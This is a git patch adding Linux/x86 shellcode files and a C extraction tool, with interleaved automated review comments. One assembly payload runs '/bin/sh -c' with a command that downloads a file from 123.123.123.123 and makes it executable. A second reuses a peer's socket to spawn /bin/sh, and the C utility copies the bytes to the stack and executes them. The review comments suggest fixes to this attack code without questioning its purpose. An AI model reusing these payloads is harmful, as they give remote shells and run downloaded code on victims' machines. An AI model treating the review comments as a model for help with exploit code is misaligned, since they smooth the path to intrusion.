From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/tsig/shellcode/execve-shellcode.s | 49 ++++++++++++++++++++
 other/tsig/shellcode/peername.s | 79 +++++++++++++++++++++++++++++++++
 other/tsig/shellcode/shellcode.c | 48 ++++++++++++++++++++
 3 files changed, 176 insertions(+)
 create mode 100644 other/tsig/shellcode/execve-shellcode.s
 create mode 100644 other/tsig/shellcode/peername.s
 create mode 100644 other/tsig/shellcode/shellcode.c
(limited to 'other/tsig/shellcode')

diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s
new file mode 100644
index 0000000..25015cf
--- /dev/null
+++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+
+.data
+.globl cbegin
+.globl cend
+
+cbegin:
+
+ jmp jahead
+
+docall:
+ pop %edi
+
+ xorl %eax, %eax /* read number of arguments */
+ push %eax
+ movb (%edi), %al
+ inc %edi
+
+decl1: push %edi
+decl2: scasb /* search delim bytes */
+ jnz decl2
+
+ movb %ah, -1(%edi)
+ dec %eax
+ jnz decl1
+
+ pop %ebx /* pathname */
+ push %ebx
+
+ push %eax
+ pop %edx /* esp -= 4, edx = &envp[] = NULL */
+ movl %esp, %ecx /* ecx = &argv[] */
+
+ movb $11, %al
+ int $0x80
+
+jahead: call docall
+
+/* reverse order arguments */
+.byte 0x03 /* number of arguments */
+.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte 0x03
+.ascii "-c"
+.byte 0x02
+.ascii "/bin/sh"
+.byte 0x01
+
+cend:
+
diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s
new file mode 100644
index 0000000..61cab0a
--- /dev/null
+++ b/other/tsig/shellcode/peername.s
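Review bot: The payload layout consumed by the decl1/decl2 loop is an undocumented contract and the `scasb` scan has no bound: `movb (%edi),%al` takes the first data byte as the argument count N, each of the N strings must end with the byte equal to its position counted from the end (0x03, 0x02, 0x01 here), and no string may contain a byte in 0x01..N, otherwise the scan runs past cend until it happens to hit that byte. A header comment stating that, e.g. `/* payload: .byte N, then N strings in reverse argv order; string k (0-based) is terminated by byte N-k and must not contain bytes 0x01..N */`, would keep the next edit from silently breaking it. `movb %ah, -1(%edi)` overwrites each delimiter with 0 in place, so the code patches its own payload and only runs from a writable mapping — presumably why it sits in `.data`; worth saying next to the section directive. The comment on `pop %edx` is also inaccurate, since the push/pop pair leaves esp unchanged; suggest `/* edx = 0 -> envp = NULL; esp unchanged, argv NULL came from the earlier push %eax */`.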
@@ -0,0 +1,79 @@
+.globl cbegin
+.globl cend
+
+cbegin:
+ xor %ebx,%ebx
+ mov $0x7,%bl
+ mov %esp,%edx
+ jmp label1
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+ stos %al,%es:(%edi)
+
+label1:
+ push $0x10
+ mov %esp,%ecx
+ push %ecx
+ push %edx
+ push $0xfe
+ mov %esp,%ecx
+label2:
+ xor %eax,%eax
+ mov $0x66,%al
+ int $0x80
+ test $0xff,%al
+ jne label3
+ cmpw $0x5234,0x12(%esp,1)
+ je label4
+label3:
+ pop %edx
+ test $0xff,%dl
+ je label7
+ dec %dl
+ push %edx
+ jmp label2
+.ascii "\x38"
+label4:
+ pop %ebx
+ xor %ecx,%ecx
+ mov $0x3,%cl
+label5:
+ dec %cl
+ xor %eax,%eax
+ mov $0x3f,%al
+ int $0x80
+ jcxz label6
+ jmp label5
+label6:
+ push $0x4
+ push $0x0
+ push $18
+ push $1
+ push %ebx
+ movl $102, %eax
+ movl $14, %ebx
+ movl %esp, %ecx
+ int $0x80
+ push $0x0
+ push $0x0
+ push $0x68732f
+ push $0x6e69622f
+ lea 0x8(%esp,1),%ecx
+ lea 0xc(%esp,1),%edx
+ mov %esp,(%ecx)
+ mov %esp,%ebx
+ xor %eax,%eax
+ mov $0xb,%al
+ int $0x80
+label7:
+ xor %eax,%eax
+ inc %al
+ int $0x80
+cend:
+
diff --git a/other/tsig/shellcode/shellcode.c b/other/tsig/shellcode/shellcode.c
new file mode 100644
index 0000000..0239f12
--- /dev/null
+++ b/other/tsig/shellcode/shellcode.c
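Review bot: In the label6 setsockopt call (socketcall with ebx = 14) the fourth argument pushed is the literal `push $0x0` where the kernel expects a pointer to the option value, so with optlen 4 this presumably fails with EFAULT; the return value is never checked and the execve still runs, but the option (level 1, name 18) never takes effect — confirm what was intended and pass the address of a real value (`push $1; lea (%esp),%eax` before building the array) if it matters. The `cmpw $0x5234,0x12(%esp,1)` reads the second halfword of the getpeername buffer that `mov %esp,%edx` placed at the saved esp (sin_port if this is a sockaddr_in), so the little-endian immediate matches a network-order port of 0x3452, not 0x5234; a comment naming the intended port would remove that ambiguity. The nine `stos %al,%es:(%edi)` after `jmp label1` and the `.ascii "\x38"` after `jmp label2` are never executed, so either explain them (`/* filler bytes, never executed */`) or drop them. Note also that the descriptor search stops before trying fd 0, because `test $0xff,%dl; je label7` exits as soon as dl reaches 0.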
@@ -0,0 +1,48 @@
+/* shellcode extraction utility,
+ * by typo / teso, small mods by scut.
+ */
+
+
+#include
+#include
+#include
+
+extern void cbegin ();
+extern void cend ();
+
+
+int
+main (int argc, char *argv[])
+{
+ int i;
+ unsigned char * buf = (unsigned char *) cbegin;
+ unsigned char ex_buf[1024];
+
+
+ printf ("/* %d byte shellcode */\n", cend - cbegin);
+ printf ("\"");
+ for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+
+ printf ("\\x%02x", *buf & 0xff);
+
+ if (++i >= 12) {
+ i = 0;
+ printf ("\"\n\"");
+ }
+ }
+ printf ("\";\n");
+
+ printf("\n");
+
+ if (argc > 1) {
+ printf ("%02x\n", ((unsigned char *) cbegin)[0]);
+ printf ("%02x\n", ex_buf[0]);
+ memcpy (ex_buf, cbegin, cend - cbegin);
+ printf ("%02x\n", ex_buf[0]);
+
+ ((void (*)()) &ex_buf)();
+ }
+
+ exit (EXIT_SUCCESS);
+}
+
-- 
cgit v1.3
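Review bot: `memcpy (ex_buf, cbegin, cend - cbegin)` copies the whole cbegin..cend range into a fixed 1024-byte stack array with no length check, so any larger shellcode overflows main's frame; guard it first, `size_t len = (size_t) ((unsigned char *) cend - (unsigned char *) cbegin); if (len > sizeof ex_buf) { fputs ("shellcode too large\n", stderr); exit (EXIT_FAILURE); }`. The `printf ("%02x\n", ex_buf[0])` that precedes the memcpy reads an uninitialized byte, which is undefined behaviour and prints nothing meaningful — drop it or move it after the copy. `cend - cbegin` subtracts two function pointers (a GNU extension) and feeds the result to `%d`, a type mismatch; `(int) ((unsigned char *) cend - (unsigned char *) cbegin)` keeps the same output and should compile cleanly under -Wall. The `((void (*)()) &ex_buf)()` call only works with an executable stack (`-z execstack` or equivalent) and runs the payload on the machine executing this tool — for the execve sample that means `/bin/sh -c` with its embedded command — so the argc > 1 branch deserves a comment saying exactly that.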